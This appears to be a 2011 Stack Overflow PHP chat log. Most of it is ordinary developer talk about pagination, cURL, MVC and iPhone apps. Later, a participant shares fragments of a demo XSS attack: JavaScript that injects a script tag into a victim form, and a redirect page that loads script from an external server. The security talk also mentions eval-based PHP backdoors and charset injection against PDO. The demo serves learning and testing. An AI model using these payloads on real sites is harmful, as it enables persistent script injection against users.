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posted on June 24, 2011 by PHP: Hypertext Preprocessor

PHP has several new documentation features that the community should be aware of: pman - PHP man pages $ pear install doc.php.net/pman$ pman strlen (this example displays a local textual version of the strlen docs) Enhanced CHM - contains user notes (over 25,000) This additional CHM file is downloadable Online Documentation Editor - allows everyone to edit the PHP manual URL: https://edit.php.n

hello all !
I need a good php script for image resize
@cyberrog why not using the default php function ?
@Oddantfr which is?
@cyberrog I don't remember but I bet if you make a little search on php.net you'll get into it in a thunder :)
3 hours later…
can somebody help me with this
Q: Complicated Query + Pagination Script

KPOProblem 1: Pagination on my script is not working. After 20 entries, it only shows the most recent 20 entries and doesn't split them into different pages. Code is below: Problem 2: I am using the same pagination script for something else and over there it splits correctly but on the next page...

3 hours later…
You're right. It is complicated.
@KPO: Can you please help me?
@KPO: I need to display img tag on the same line after h2 tag. How can I do that in html?
send me smeothing you have
I am making dynamic html.
In iPhone applicaiton.
ok do somethign like
And need to show image after "h2" tag.
like image followed by text
<h2>sample</h2><img src='' height='' width'' id=''>
I am doing the same.
then alin the img id with the h2 tag
But image going to next line.
align with h2 tag?
I think align used for center, left,right.
align with margin-top and margin-left respectively
one min
Let me try
Thanks. It worked.
can you help me with mine?
the one i posted above
Actually I am from iPhone background sir.
So, Can't help in that case
got a question for you
i am doing a website right now
and want to release an iphone app
i am alright with php/mysql
Great. @KPO
what do i need to do an app
@KPO: Which type of app for iPhone?
for now basic stuff like: adding stuff through the phone and syncing feeds etc
notifications would be nice
@KPO: Yes, I am doing that type of apps here.
@KPO: Sync can be done by web services from PHP.
but isn't the app mostly reliant on c++
@KPO: Yes. it's objective c.
@KPO: Do you have iPhone developer for that?
i can't afford one
so i am trying to learn
any ideas where i can start?
@KPO: u can learn iPhone development.
@KPO: Need to install XCOde in ur Mac machine.
@KPO: Start to learn objective c language.
any ref materials online that you use?
@KPO: What should I do to align image vertically center?
i got this book from o'reilly
@KPO: o'reilly book is awesome.
@KPO: U can start with it and ask questions on SO.
well the image has to be vertical or horizontal. but you can use margin-left:
try using something like margin-left:300px;
I need to align vertical center.
@KPO: If you need then I can provide mobile application development service to you. Where are you from?
new york
@KPO: I am from India. And having my own software development company.
@KPO: I can provide you the best software solution you want.
oh your name?
I am Ketan Patel.
@KPO: Do you have skype id?
No. You can give m your email.
@KPO: U noted Ketan?
1 hour later…
Q: How to get Square Size Profile Image of Twitter and Facebook with Logo Embedded ?

Alex MathewHiwhile i go through this site(http://www.talenthouse.com/creativeinvites/preview/ae2dd0ca9ac9d1881f27132df12b6dd1/219),i came to see that while i login with help of either by twitter or facebook ,with my profile image, the F logo for Facebook and T Logo for twitter is embedded, how can i do that...

what's the best method to get a remote webpage ?
I made a little search but there is a bunch of ones that now I'm drowning into and don't know which one to use
or cURL in case you want to do more advanced stuff
Then again, it depends on what you want to do with the remote webpage?
Just fyi file_get_contents will do basic page fetching at least.
yes I know that stuff
well I just wanna know what is the best function btw
I'm using file get contents
@Oddantfr do you want to parse it afterwards?
@Gordon not really
well I want to be able to modify the http header as well
Use cURL then.
I saw we can accomplish that with file_get_contents too
you mean the request to the remote page?
but just want to know which one is best known for this purpose ?
i prefer passing a stream context for that
what do you do with the page after you retrieved it?
@Tek thanks I didn't know it however is that a librairy to download ?
@Oddantfr Like I and Gordon said, what exactly do you want to do with the page and what in the header do you want to change?
@Gordon nothing special, I'm just experiencing over
> libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.
so curl is not exactly an http download library
it can do what you ask for though, so can the http extension or a stream context
if you want to extract data from the page afterwards use a DOM parser directly
A: Best methods to parse HTML with PHP

GordonI prefer using one of the native XML extensions, like DOM or XMLReader. If you prefer a 3rd party lib, I'd suggest not to use SimpleHtmlDom, but a lib that actually uses DOM/libxml underneath instead of String Parsing: phpQuery, Zend_Dom, QueryPath, FluentDom or fDOMDocument You c...

if you need to modify the request from the DOM parser, you can use a stream context again
@Gordon thanks for your support I'll try to use it
@Gordon Working on anything on Github? Just browsing stuff stack overflow users are doing :)
@Tek my github account is github.com/gooh but there aint much going on. there is just the phpunit-schema and the simpledic project. the latter you dont want to use
Ah, all right. How's it going around these parts btw? I haven't been on in a while :)
you mean in the chat? cant tell, @edorian and @ircmaxell aint here much anymore and im usually too busy lately, so i mostly lurk and read superficially.
@Gordon Ah, thanks for the update. That's a shame, any particular reason they aren't on here much? If you happen to know anyway. Then again, same here, heh.
@Tek i think @irc is busy with the new job and @edorian busy with the current. not sure
Yeah that's probably it. I wonder how @ircmaxell job is going, good for him though. @Gordon Hope your busy-ness is going well
I'd type business but I don't like the sound of that in that sentense
cant complain
@Gordon Any chance you know of any MVC-specific books? I'd like to study some more into domain objects, data mappers and I'm still not very familiar with bootloaders and factories. Stuff online is vague and inconsistent
@Tek Patterns of Enterprise Appliation Architecture by Martin Fowler and Domain Driven Design by Eric Evans
and the Gang Of Four book on Patterns
Thanks :)
and Misko Hevery's Clean Code talks on YouTube
You mean the one from google?
thats not necessarily about how to build an MVC application, but its good knowledge and MVC shouldnt be an issue then anymore
yes, the one from google
Ah, I've watched those. Though I haven't been keeping up with them if they've released new ones
I should probably do that now =)
there is also a lengthy article by fowler on his bliki about MVC and how it evolved
imo, MVC isnt interesting if you understand it as the separation of UI from business logic
Maybe it's not, but I'd like to be able to write it. Then move on from there
which isnt necessarily what others will tell you what it is, but those others will draw you into quibble about various concrete implementations like MVP, HMVC, MVC Model 2 and the "original" Smalltalk MVC
there aint much to write. all you have to make sure is that you separate the UI into three distinct roles. model = all your business logic, persistence layers, service layers, etc, e.g. anything but GUI. controller takes requests and delegates to the model, view renders/displays model.
and thats when people will tell you that cant work because there is the internet inbetween but i find such discussion pointless because the key element is the separation and not how you implemented it. keep em separated
in the "original" mvc, the view would update whenever the model updates. not the case in webbased mvc, because there is no observer pattern and the view usually doesnt update but gets rendered anew and returned through the controller. all true but that doesnt change that they are separated
in general, if you can swap out your gui without having to change your model, you are on a pretty good way
Ah, I see. And I get about there not being much to write, except when I don't even know what a persistence/service layer is I have much to learn =)
1 hour later…
Good Morning
morning ;)
How's it going?
well, reading gordons long message in here :-D
@Gordon I'm not saying that only mvc is that in smalltalk (even if it looks like so), but it's imho important to realize how it works there.

you have class browser (view+controller) working on model (classes), and few clicks later, you have 3 another browsers, with possibly different view, controller, or model... it really works like that and it's reasonable use-case for MVC.

when you don't have different views, when you don't have different controllers, why bother with MVC? because of UI separation? you can do it even without mvc...
just wanted to make it clear what was point of my previous thoughts. no offense.
@ircmaxell what about you?
I'm in the middle
Part of me says all MVC is about is the separation of concerns, and call any 3 tiered pattern MVC...
the other part says that design patterns are only good when the name indicates the relationships between the classes. Therefore there is only one MVC with one set of relationships. That way, we have a common language to not only understand how it's layed out, but how it works as well...
@ircmaxell yeah... I was reacting on "How's it going?" :-P
Oh, lol
it's going well
but I partially agree - patterns should be part of communication and vagueness of MVC makes this harder...
good to hear :)
what about your xss app?
just pushed the finishing commit
cool - what about that "bad-app" which is going to hack it? :)
That's just a script
kidding :-P
are going to publish that script? I'd be pleased to have a look
it's dirt simple
of course - don't forget I'm no security guru as you ;)
it's simple
Good afternoon
if you've discovered UTF-8 based sql injection and vulnerability in most php frameworks, there has to be something tricky with your xss example :)
I've got a security question: Which technique is used to add code to php script?
I don't want to hack, just prevent it :P
@KamilTomšík Well, there is something interesting
well, for example evaling decrypted code in each php file
I saw it on SO, so i want to know how to prevent it :P
@ircmaxell go on :-P
that's a very difficult thing to say without knowing context or what you're doing @Robik...
I don't remeber it exacly but that code was added on beginning of each php file: eval(decrypt('blahblahblah'))
on one of your sites?
For example ( i havent been attacked but i saw question on SO)
And I just want to know how to prevent it.
Or just someone who have access to his FTP added it manually :P
You want to prevent it? Get a new host
95% of those attacks are from the host level (where the host server gets hacked, and they inject into every site on the server)
So there is no way liek SQL injection to add it? :P
Thanks for info
only if you're doing something stupid in your code
foreach( $_REQUEST as $request )
It is stupid enough?
@Robik definitely
@Gordon Thanks. I am good in that :P
can someone tell me why Symfony framework requires a URL of the sort: localhost/Symfony/web/app_dev.php/something rather than localhost/something and how I can direct it to the same or better yet, to dev.localhost/something
var div = document.getElementsByTagName('div')[0];
var body = document.getElementsByTagName('body')[0];
var newp = document.createElement('p');
newp.appendChild(document.createTextNode('Please Wait...'));
body.replaceChild(newp, div);

var iframe = document.createElement('iframe');
iframe.onload = function() {
    var doc = iframe.contentWindow.document;
    doc.getElementById('location').value = 'Some Fake Location';
    doc.getElementById('greeting').value = '<script type="text/javascript">alert("hi! This is injected");</script>';
@ircmaxell thx, but what's the point? :)
and... var body = document.body; //should be better
Hi, I try to send Post variables to a website using fsockopen
but this doesn't look like it works
@Oddantfr ; are the examples on php.net/manual/en/function.fsockopen.php insufficient ?
hi all
@ircmaxell what is your xss app good for?
for testing some static analysis xss detection tool (though I can't imagine that, the project's too complicated)
or just as an example?
@salathe thx for githubbing php and docs :)
Hey hey
@nikic Learning about XSS and how to defend against it, in addition to testing tools
@KamilTomšík I inject that script transiently into a page, which turns into a persistent injection... Which lets me do anything I want (for now I'm just alerting). But the point is to the victim, it's transparent...
@ircmaxell but how? :) same-domain should restrict you from doing this.
it doesn't, because it is running on the same domain
I host that script on an external server
hmm, not very much activity in the chats : ( does anyone have some experience with Chrome extension development?
hello (:
Then, I hit a file on the external server: (localhost:88 to prove that it's not on the same server)
<h2>Please Wait, Redirecting...</h2>
<script type="text/javascript"><!--
window.location = "http://localhost/XssBadWebApp/index.php?action=<?php echo urlencode("<script src='http://localhost:88/hack/script.js'></script>"); ?>";
@ircmaxell okay, well you can do pretty anything if you can inject html.
that's the point
that's what this is demonstrating
@ircmaxell alright then, great example
Why clicking on unknown URLs can be dangerous
@ircmaxell well... you don't need long url for this...
@ircmaxell you can load that code from other resource
yeah, but I don't need to. The URL is only open for about 0.2 seconds. It blinks away so fast 99.9% of people won't realize it
@ircmaxell I guess clickjacking is much bigger problem, because you can't see it at all...
but yeah, I see the point - click on url, and redirect - so it won't be visible anymore
This isn't clickjacking though
it's not
you're right, sql injections and xss are the only roots of all evil...
you can do pretty anything with them.
i don't know whether they really are
I'm not saying clickjacking is nor bad, but it's not on the top 10: owasp.org/index.php/Category:OWASP_Top_Ten_Project
yes, you can do very much bad stuff with them, but they are also the two easiest attacks to protect against
Not really. It's a lot harder to protect against each than people realize
Sure, for guys still using mysql_query, probably
@nikic: what do you use?
let me rephrase that: A lot of methods people use that they think is secure, is actually not
but even with mysql_ it's easy enough to protect yourself
PDO is not secure
by itself not
what do you mean?
but used correctly i assume it to be secure
see those slides
I can inject into PDO::prepare() (depending on the circumstances)
i'll look into them ;)
I have to record that talk...
hm, can you maybe tell me which page to jump to? that's pretty many slides
you need to pass the charset to the DSN ?!
@nikic in short - pdo prepared statement is not safe if you don't force it to utf-8
@Kamil: No, it's not safe unless either you are on >=5.3.6 and pass in the dsn charset, or BOTH the client and server are configured to run UTF-8
you can configure the server as GBK, and even forcing to UTF-8 won't entirely fix the problem
ah good, i'm utf on both sides
@ircmaxell thx for correcting :)
too bad PHP won't backport that chnge
which change?
the charset dsn param...
so after all being secure is trivial again ^^
use utf8 (which you should do either way) and always escape
But it's more complicated than just using prepared statements. Especially since PS don't allow binding of identifiers. So to sort you need to put in unescaped data (since mres won't work either)
which is why there is no silver bullet
yep, the missing support for escaping identifiers really hurts
though I never really had a need for that
ok, I;m out
what about it?
nothing, was just funny :-D
3 hours later…
can anyone answer this one please? stackoverflow.com/questions/6485814/…
@afarazit , there is already an answer in comments
.. you really should learn about regular expressions
or other developers will point fingers at you and giggle
i just wondered
whether one can validate HTML using regex...
or maybe even parse
@nikic sure, but it will require an effort similar to stackoverflow.com/questions/4231382/…
looks nice
makes me wonder what you can not do using PCRE
seems like pcre can't handle left recursion
i just thought I could quickly hack together a regex based PHP parser, but without left recursion I would need to change the grammar :(
how can i allow php to read/write files anywhere in linux ?
You don't.
It comes along with a big security risk
You wouldn't like it at all if people started reading out your config or password files
There's a reason to right management, you shouldn't trick it
@kritya you'd have to run apache as root. or put it into a group that can read/write anywhere. bad idea.
why would you need that anyway?
I want to read a file on my dedicated server to write a file in the directory /home/user/
00:00 - 20:0020:00 - 00:00

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